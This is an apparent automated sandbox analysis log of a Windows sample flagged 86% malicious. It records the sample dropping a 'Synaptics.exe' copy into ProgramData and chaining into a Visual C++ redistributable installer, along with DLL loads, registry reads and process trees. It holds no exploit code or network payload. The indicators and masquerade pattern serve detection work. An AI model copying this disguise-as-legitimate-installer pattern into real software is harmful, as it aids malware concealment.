Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: crypt32.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: feclient.dll	2_2_007C1070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: cabinet.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: msi.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: version.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: wininet.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: comres.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: clbcatq.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: msasn1.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: crypt32.dll	3_2_00E41070
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Command line argument: feclient.dll	3_2_00E41070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: cabinet.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: msi.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: version.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: wininet.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: comres.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: clbcatq.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: msasn1.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: crypt32.dll	8_2_00C11070
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Command line argument: feclient.dll	8_2_00C11070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: cabinet.dll	18_2_00711070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: version.dll	18_2_00711070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: wininet.dll	18_2_00711070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: comres.dll	18_2_00711070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: clbcatq.dll	18_2_00711070
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Command line argument: feclient.dll	18_2_00711070

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 452cb9.msi.16.dr, 452cb2.msi.16.dr

Binary or memory string: SELECT `WixDependencyProvider`.`WixDependencyProvider`, `WixDependencyProvider`.`Component_`, `WixDependencyProvider`.`ProviderKey`, `WixDependencyProvider`.`Attributes` FROM `WixDependencyProvider`SELECT `WixDependency`.`WixDependency`, `WixDependencyProvider`.`Component_`, `WixDependency`.`ProviderKey`, `WixDependency`.`MinVersion`, `WixDependency`.`MaxVersion`, `WixDependency`.`Attributes` FROM `WixDependencyProvider`, `WixDependency`, `WixDependencyRef` WHERE `WixDependency`.`WixDependency` = `WixDependencyRef`.`WixDependency_` AND `WixDependencyProvider`.`WixDependencyProvider` = `WixDependencyRef`.`WixDependencyProvider_`WixDependencyRequireFailed to initialize.Failed to initialize the registry functions.ALLUSERSFailed to ensure required dependencies for (re)installing components.WixDependencyCheckFailed to ensure absent dependents for uninstalling components.WixDependencySkipping the dependency check since no dependencies are authored.Failed to check if the WixDependency table exists.Failed to initialize the unique dependency string list.Failed to open the query view for dependencies.Failed to get WixDependency.WixDependency.Failed to get WixDependencyProvider.Component_.Skipping dependency check for %ls because the component %ls is not being (re)installed.Failed to get WixDependency.ProviderKey.Failed to get WixDependency.MinVersion.Failed to get WixDependency.MaxVersion.Failed to get WixDependency.Attributes.Failed dependency check for %ls.Failed to enumerate all of the rows in the dependency query view.Failed to create the dependency record for message %d.Unexpected message response %d from user or bootstrapper application.Failed to get the ignored dependents.ALLFailed to check if "ALL" was set in IGNOREDEPENDENCIES.Skipping the dependencies check since IGNOREDEPENDENCIES contains "ALL".WixDependencyProviderSkipping the dependents check since no dependency providers are authored.Failed to check if the WixDependencyProvider table exists.Failed to open the query view for dependency providers.Failed to get WixDependencyProvider.WixDependencyProvider.Failed to get WixDependencyProvider.Component.Skipping dependents check for %ls because the component %ls is not being uninstalled.Failed to get WixDependencyProvider.ProviderKey.Failed to get WixDependencyProvider.Attributes.Failed dependents check for %ls.Failed to enumerate all of the rows in the dependency provider query view.;IGNOREDEPENDENCIESFailed to get the string value of the IGNOREDEPENDENCIES property.Failed to create the string dictionary.Failed to ignored dependency "%ls" to the string dictionary.wixdepca.cppNot enough memory to create the message record.Failed to set the message identifier into the message record.Failed to set the number of dependencies into the message record.The dependency "%ls" is missing or is not the required version.Found dependent "%ls", name: "%ls".Failed to set the dependency key "%ls" into the message record.Failed to set the dependency name "%ls" into

Source: file.exe

ReversingLabs: Detection: 86%

Source: ._cache_file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: ._cache_file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: VC_redist.x86.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: VC_redist.x86.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe "C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=644 -burn.filehandle.self=652
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Process created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe "C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{C5083B7D-B45A-4E12-82C2-69D6A2D5E9AA} {2D07A715-CF60-42B0-9715-B6AF208420A8} 5272
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Windows\System32\SrTasks.exe C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1
Source: C:\Windows\System32\SrTasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknown	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" /burn.runonce
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe"
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe "C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=644 -burn.filehandle.self=652	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Process created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe "C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{C5083B7D-B45A-4E12-82C2-69D6A2D5E9AA} {2D07A715-CF60-42B0-9715-B6AF208420A8} 5272	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe"
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Process created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
